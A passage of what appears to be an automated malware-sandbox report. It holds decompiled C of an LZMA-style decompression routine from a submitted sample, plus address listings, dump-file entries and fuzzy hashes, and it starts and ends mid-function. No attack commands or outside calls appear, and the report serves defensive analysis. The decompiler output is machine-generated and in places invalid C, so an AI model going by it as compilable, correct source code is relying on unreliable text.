							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                    0x00406bc0
                    0x00406bc7
                    0x00406bcd
                    0x00406bd3
                    0x00000000
                    0x00406bd7
                    0x00406be3
                    0x00406be3
                    0x00406be3
                    0x00406bec
                    0x00000000
                    0x00000000
                    0x00406bf2
                    0x00000000
                    0x00406bf9
                    0x00406bfd
                    0x00000000
                    0x00000000
                    0x00406c06
                    0x00406c09
                    0x00406c0c
                    0x00406c0e
                    0x00406c10
                    0x00000000
                    0x00000000
                    0x00406c16
                    0x00406c19
                    0x00406c1b
                    0x00406c1c
                    0x00406c1f
                    0x00406c21
                    0x00406c22
                    0x00406c24
                    0x00406c27
                    0x00406c2c
                    0x00406c31
                    0x00406c3a
                    0x00406c4d
                    0x00406c50
                    0x00406c59
                    0x00406c5c
                    0x00406c84
                    0x00406c84
                    0x00406c86
                    0x00406c94
                    0x00406c94
                    0x00406c98
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406c88
                    0x00406c88
                    0x00406c8b
                    0x00406c8b
                    0x00406c8c
                    0x00406c8c
                    0x00000000
                    0x00406c88
                    0x00406c5e
                    0x00406c62
                    0x00406c67
                    0x00406c67
                    0x00406c70
                    0x00406c76
                    0x00406c78
                    0x00406c7b
                    0x00000000
                    0x00406c81
                    0x00406c81
                    0x00000000
                    0x00406c81
                    0x00000000
                    0x00406c9e
                    0x00406c9e
                    0x00406ca2
                    0x0040754e
                    0x00000000
                    0x0040754e
                    0x00406cab
                    0x00406cbb
                    0x00406cbe
                    0x00406cc1
                    0x00406cc1
                    0x00406cc1
                    0x00406cc4
                    0x00406cc4
                    0x00406cc8
                    0x00000000
                    0x00000000
                    0x00406cca
                    0x00406ccd
                    0x00406cd0
                    0x00406cfa
                    0x00406d00
                    0x00406d07
                    0x00000000
                    0x00406d07
                    0x00406cd2
                    0x00406cd6
                    0x00406cd9
                    0x00406cde
                    0x00406cde
                    0x00406ce9
                    0x00406cef
                    0x00406cf1
                    0x00406cf4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406d39
                    0x00406d3f
                    0x00406d42
                    0x00406d4f
                    0x00406d57
                    0x00000000
                    0x00000000
                    0x00406d0e
                    0x00406d0e
                    0x00406d12
                    0x0040755d
                    0x00000000
                    0x0040755d
                    0x00406d1e
                    0x00406d29
                    0x00406d29
                    0x00406d29
                    0x00406d2c
                    0x00406d2f
                    0x00406d32
                    0x00406d35
                    0x00406d37
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004073ce
                    0x004073ce
                    0x004073d4
                    0x004073da
                    0x004073dd
                    0x004073e0
                    0x004073fa
                    0x004073fd
                    0x00407403
                    0x0040740e
                    0x0040740e
                    0x00407410
                    0x004073e2
                    0x004073e2
                    0x004073f1
                    0x004073f5
                    0x004073f5
                    0x00407413
                    0x0040741a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040741c
                    0x0040741c
                    0x00407420
                    0x004075cf
                    0x00000000
                    0x004075cf
                    0x0040742c
                    0x00407433
                    0x0040743b
                    0x0040743b
                    0x0040743b
                    0x0040743e
                    0x00407441
                    0x00407441
                    0x00000000
                    0x00000000
                    0x00406d5f
                    0x00406d61
                    0x00406d64
                    0x00406dd5
                    0x00406dd8
                    0x00406ddb
                    0x00406de2
                    0x00406dec
                    0x00000000
                    0x00406dec
                    0x00406d66
                    0x00406d6a
                    0x00406d6d
                    0x00406d6f
                    0x00406d72
                    0x00406d75
                    0x00406d77
                    0x00406d7a
                    0x00406d7c
                    0x00406d81
                    0x00406d84
                    0x00406d87
                    0x00406d8b
                    0x00406d92
                    0x00406d95
                    0x00406d9c
                    0x00406da0
                    0x00406da8
                    0x00406da8
                    0x00406da8
                    0x00406da2
                    0x00406da2
                    0x00406da2
                    0x00406d97
                    0x00406d97
                    0x00406d97
                    0x00406dac
                    0x00406daf
                    0x00406dcd
                    0x00406dcf
                    0x00000000
                    0x00406dcf
                    0x00406db1
                    0x00406db4
                    0x00406db7
                    0x00406dba
                    0x00406dbc
                    0x00406dbc
                    0x00406dbc
                    0x00406dbf
                    0x00406dc2
                    0x00406dc4
                    0x00406dc5
                    0x00406dc8
                    0x00000000
                    0x00000000
                    0x00406ffe
                    0x00407002
                    0x00407020
                    0x00407023
                    0x0040702a
                    0x0040702d
                    0x00407030
                    0x00407033
                    0x00407036
                    0x00407039
                    0x0040703b
                    0x00407042
                    0x00407043
                    0x00407045
                    0x00407048
                    0x0040704b
                    0x0040704e
                    0x0040704e
                    0x00407053
                    0x00000000
                    0x00407053
                    0x00407004
                    0x00407007
                    0x0040700a
                    0x00407014
                    0x00000000
                    0x00000000
                    0x00407068
                    0x0040706c
                    0x0040708f
                    0x00407092
                    0x00407095
                    0x0040709f
                    0x0040706e
                    0x0040706e
                    0x00407071
                    0x00407074
                    0x00407077
                    0x00407084
                    0x00407087
                    0x00407087
                    0x00000000
                    0x00000000
                    0x004070ab
                    0x004070af
                    0x00000000
                    0x00000000
                    0x004070b5
                    0x004070b9
                    0x00000000
                    0x00000000
                    0x004070bf
                    0x004070c1
                    0x004070c5
                    0x004070c5
                    0x004070c8
                    0x004070cc
                    0x00000000
                    0x00000000
                    0x0040711c
                    0x00407120
                    0x00407127
                    0x0040712a
                    0x0040712d
                    0x00407137
                    0x00000000
                    0x00407137
                    0x00407122
                    0x00000000
                    0x00000000
                    0x00407143
                    0x00407147
                    0x0040714e
                    0x00407151
                    0x00407154
                    0x00407149
                    0x00407149
                    0x00407149
                    0x00407157
                    0x0040715a
                    0x0040715d
                    0x0040715d
                    0x00407160
                    0x00407163
                    0x00407166
                    0x00407166
                    0x00407169
                    0x00407170
                    0x00407175
                    0x00000000
                    0x00000000
                    0x00407203
                    0x00407203
                    0x00407207
                    0x004075a5
                    0x00000000
                    0x004075a5
                    0x0040720d
                    0x00407210
                    0x00407213
                    0x00407217
                    0x0040721a
                    0x00407220
                    0x00407222
                    0x00407222
                    0x00407222
                    0x00407225
                    0x00407228
                    0x00000000
                    0x00000000
                    0x00406df8
                    0x00406df8
                    0x00406dfc
                    0x00407569
                    0x00000000
                    0x00407569
                    0x00406e02
                    0x00406e05
                    0x00406e08
                    0x00406e0c
                    0x00406e0f
                    0x00406e15
                    0x00406e17
                    0x00406e17
                    0x00406e17
                    0x00406e1a
                    0x00406e1d
                    0x00406e1d
                    0x00406e20
                    0x00406e23
                    0x00000000
                    0x00000000
                    0x00406e29
                    0x00406e2f
                    0x00000000
                    0x00000000
                    0x00406e35
                    0x00406e35
                    0x00406e39
                    0x00406e3c
                    0x00406e3f
                    0x00406e42
                    0x00406e45
                    0x00406e46
                    0x00406e49
                    0x00406e4b
                    0x00406e51
                    0x00406e54
                    0x00406e57
                    0x00406e5a
                    0x00406e5d
                    0x00406e60
                    0x00406e63
                    0x00406e7f
                    0x00406e82
                    0x00406e85
                    0x00406e88
                    0x00406e8f
                    0x00406e93
                    0x00406e95
                    0x00406e99
                    0x00406e65
                    0x00406e65
                    0x00406e69
                    0x00406e71
                    0x00406e76
                    0x00406e78
                    0x00406e7a
                    0x00406e7a
                    0x00406e9c
                    0x00406ea3
                    0x00406ea6
                    0x00000000
                    0x00406eac
                    0x00000000
                    0x00406eac
                    0x00000000
                    0x00406eb1
                    0x00406eb1
                    0x00406eb5
                    0x00407575
                    0x00000000
                    0x00407575
                    0x00406ebb
                    0x00406ebe
                    0x00406ec1
                    0x00406ec5
                    0x00406ec8
                    0x00406ece
                    0x00406ed0
                    0x00406ed0
                    0x00406ed0
                    0x00406ed3
                    0x00406ed6
                    0x00406ed6
                    0x00406ed6
                    0x00406edc
                    0x00000000
                    0x00000000
                    0x00406ede
                    0x00406ee1
                    0x00406ee4
                    0x00406ee7
                    0x00406eea
                    0x00406eed
                    0x00406ef0
                    0x00406ef3
                    0x00406ef6
                    0x00406ef9
                    0x00406efc
                    0x00406f14
                    0x00406f17
                    0x00406f1a
                    0x00406f1d
                    0x00406f1d
                    0x00406f20
                    0x00406f24
                    0x00406f26
                    0x00406efe
                    0x00406efe
                    0x00406f06
                    0x00406f0b
                    0x00406f0d
                    0x00406f0f
                    0x00406f0f
                    0x00406f29
                    0x00406f30
                    0x00406f33
                    0x00000000
                    0x00406f35
                    0x00000000
                    0x00406f35
                    0x00406f33
                    0x00406f3a
                    0x00406f3a
                    0x00406f3a
                    0x00406f3a
                    0x00000000
                    0x00000000
                    0x00406f75
                    0x00406f75
                    0x00406f79
                    0x00407581
                    0x00000000
                    0x00407581
                    0x00406f7f
                    0x00406f82
                    0x00406f85
                    0x00406f89
                    0x00406f8c
                    0x00406f92
                    0x00406f94
                    0x00406f94
                    0x00406f94
                    0x00406f97
                    0x00406f9a
                    0x00406f9a
                    0x00406fa0
                    0x00406f3e
                    0x00406f3e
                    0x00406f41
                    0x00000000
                    0x00406f41
                    0x00406fa2
                    0x00406fa2
                    0x00406fa5
                    0x00406fa8
                    0x00406fab
                    0x00406fae
                    0x00406fb1
                    0x00406fb4
                    0x00406fb7
                    0x00406fba
                    0x00406fbd
                    0x00406fc0
                    0x00406fd8
                    0x00406fdb
                    0x00406fde
                    0x00406fe1
                    0x00406fe1
                    0x00406fe4
                    0x00406fe8
                    0x00406fea
                    0x00406fc2
                    0x00406fc2
                    0x00406fca
                    0x00406fcf
                    0x00406fd1
                    0x00406fd3
                    0x00406fd3
                    0x00406fed
                    0x00406ff4
                    0x00406ff7
                    0x00000000
                    0x00406ff9
                    0x00000000
                    0x00406ff9
                    0x00000000
                    0x00407286
                    0x00407286
                    0x0040728a
                    0x004075b1
                    0x00000000
                    0x004075b1
                    0x00407290
                    0x00407293
                    0x00407296
                    0x0040729a
                    0x0040729d
                    0x004072a3
                    0x004072a5
                    0x004072a5
                    0x004072a5
                    0x004072a8
                    0x00000000
                    0x00000000
                    0x00407056
                    0x00407056
                    0x00407059
                    0x00000000
                    0x00000000
                    0x00407395
                    0x00407399
                    0x004073bb
                    0x004073be
                    0x004073c8
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x0040739b
                    0x0040739e
                    0x004073a2
                    0x004073a5
                    0x004073a5
                    0x004073a8
                    0x00000000
                    0x00000000
                    0x00407452
                    0x00407456
                    0x00407474
                    0x00407474
                    0x00407474
                    0x0040747b
                    0x00407482
                    0x00407489
                    0x00407489
                    0x00000000
                    0x00407489
                    0x00407458
                    0x0040745b
                    0x0040745e
                    0x00407461
                    0x00407468
                    0x004073ac
                    0x004073ac
                    0x004073af
                    0x00000000
                    0x00000000
                    0x00407543
                    0x00407546
                    0x00000000
                    0x00000000
                    0x0040717d
                    0x0040717f
                    0x00407186
                    0x00407187
                    0x00407189
                    0x0040718c
                    0x00000000
                    0x00000000
                    0x00407194
                    0x00407197
                    0x0040719a
                    0x0040719c
                    0x0040719e
                    0x0040719e
                    0x0040719f
                    0x004071a2
                    0x004071a9
                    0x004071ac
                    0x004071ba
                    0x00000000
                    0x00000000
                    0x00407490
                    0x00407490
                    0x00407493
                    0x0040749a
                    0x00000000
                    0x00000000
                    0x0040749f
                    0x0040749f
                    0x004074a3
                    0x004075db
                    0x00000000
                    0x004075db
                    0x004074a9
                    0x004074ac
                    0x004074af
                    0x004074b3
                    0x004074b6
                    0x004074bc
                    0x004074be
                    0x004074be
                    0x004074be
                    0x004074c1
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c7
                    0x004074c7
                    0x004074cb
                    0x0040752b
                    0x0040752e
                    0x00407533
                    0x00407534
                    0x00407536
                    0x00407538
                    0x0040753b
                    0x00407447
                    0x00407447
                    0x00000000
                    0x00407447
                    0x004074cd
                    0x004074d3
                    0x004074d6
                    0x004074d9
                    0x004074dc
                    0x004074df
                    0x004074e2
                    0x004074e5
                    0x004074e8
                    0x004074eb
                    0x004074ee
                    0x00407507
                    0x0040750a
                    0x0040750d
                    0x00407510
                    0x00407514
                    0x00407516
                    0x00407516
                    0x00407517
                    0x0040751a
                    0x004074f0
                    0x004074f0
                    0x004074f8
                    0x004074fd
                    0x004074ff
                    0x00407502
                    0x00407502
                    0x0040751d
                    0x00407524
                    0x00000000
                    0x00407526
                    0x00000000
                    0x00407526
                    0x00000000
                    0x004071c2
                    0x004071c5
                    0x004071fb
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732e
                    0x0040732e
                    0x00407331
                    0x00407333
                    0x004075bd
                    0x00000000
                    0x004075bd
                    0x00407339
                    0x0040733c
                    0x00000000
                    0x00000000
                    0x00407342
                    0x00407346
                    0x00407349
                    0x00407349
                    0x00407349
                    0x00000000
                    0x00407349
                    0x004071c7
                    0x004071c9
                    0x004071cb
                    0x004071cd
                    0x004071d0
                    0x004071d1
                    0x004071d3
                    0x004071d5
                    0x004071d8
                    0x004071db
                    0x004071f1
                    0x004071f6
                    0x0040722e
                    0x0040722e
                    0x00407232
                    0x0040725e
                    0x00407260
                    0x00407267
                    0x0040726a
                    0x0040726d
                    0x0040726d
                    0x00407272
                    0x00407272
                    0x00407274
                    0x00407277
                    0x0040727e
                    0x00407281
                    0x004072ae
                    0x004072ae
                    0x004072b1
                    0x004072b4
                    0x00407328
                    0x00407328
                    0x00407328
                    0x00000000
                    0x00407328
                    0x004072b6
                    0x004072bc
                    0x004072bf
                    0x004072c2
                    0x004072c5
                    0x004072c8
                    0x004072cb
                    0x004072ce
                    0x004072d1
                    0x004072d4
                    0x004072d7
                    0x004072f0
                    0x004072f2
                    0x004072f5
                    0x004072f6
                    0x004072f9
                    0x004072fb
                    0x004072fe
                    0x00407300
                    0x00407302
                    0x00407305
                    0x00407307
                    0x0040730a
                    0x0040730e
                    0x00407310
                    0x00407310
                    0x00407311
                    0x00407314
                    0x00407317
                    0x004072d9
                    0x004072d9
                    0x004072e1
                    0x004072e6
                    0x004072e8
                    0x004072eb
                    0x004072eb
                    0x0040731a
                    0x00407321
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x00000000
                    0x00407323
                    0x00000000
                    0x00407323
                    0x00407321
                    0x00407234
                    0x00407237
                    0x00407239
                    0x0040723c
                    0x0040723f
                    0x00407242
                    0x00407244
                    0x00407247
                    0x0040724a
                    0x0040724a
                    0x0040724d
                    0x0040724d
                    0x00407250
                    0x00407257
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x00000000
                    0x00407259
                    0x00000000
                    0x00407259
                    0x00407257
                    0x004071dd
                    0x004071e0
                    0x004071e2
                    0x004071e5
                    0x00000000
                    0x00000000
                    0x00406f44
                    0x00406f44
                    0x00406f48
                    0x0040758d
                    0x00000000
                    0x0040758d
                    0x00406f4e
                    0x00406f51
                    0x00406f54
                    0x00406f57
                    0x00406f5a
                    0x00406f5d
                    0x00406f60
                    0x00406f62
                    0x00406f65
                    0x00406f68
                    0x00406f6b
                    0x00406f6d
                    0x00406f6d
                    0x00406f6d
                    0x00000000
                    0x00000000
                    0x004070cf
                    0x004070cf
                    0x004070d3
                    0x00407599
                    0x00000000
                    0x00407599
                    0x004070d9
                    0x004070dc
                    0x004070df
                    0x004070e2
                    0x004070e4
                    0x004070e4
                    0x004070e4
                    0x004070e7
                    0x004070ea
                    0x004070ed
                    0x004070f0
                    0x004070f3
                    0x004070f6
                    0x004070f7
                    0x004070f9
                    0x004070f9
                    0x004070f9
                    0x004070fc
                    0x004070ff
                    0x00407102
                    0x00407105
                    0x00407105
                    0x00407105
                    0x00407108
                    0x0040710a
                    0x0040710a
                    0x00000000
                    0x00000000
                    0x0040734c
                    0x0040734c
                    0x0040734c
                    0x00407350
                    0x00000000
                    0x00000000
                    0x00407356
                    0x00407359
                    0x0040735c
                    0x0040735f
                    0x00407361
                    0x00407361
                    0x00407361
                    0x00407364
                    0x00407367
                    0x0040736a
                    0x0040736d
                    0x00407370
                    0x00407373
                    0x00407374
                    0x00407376
                    0x00407376
                    0x00407376
                    0x00407379
                    0x0040737c
                    0x0040737f
                    0x00407382
                    0x00407385
                    0x00407389
                    0x0040738b
                    0x0040738e
                    0x00000000
                    0x00407390
                    0x0040710d
                    0x0040710d
                    0x00000000
                    0x0040710d
                    0x0040738e
                    0x004075c3
                    0x004075e5
                    0x004075eb
                    0x004075ed
                    0x004075f4
                    0x00000000
                    0x00000000
                    0x00406bf2
                    0x004075fa
                    0x004075fa
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                    • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                    • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                    • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
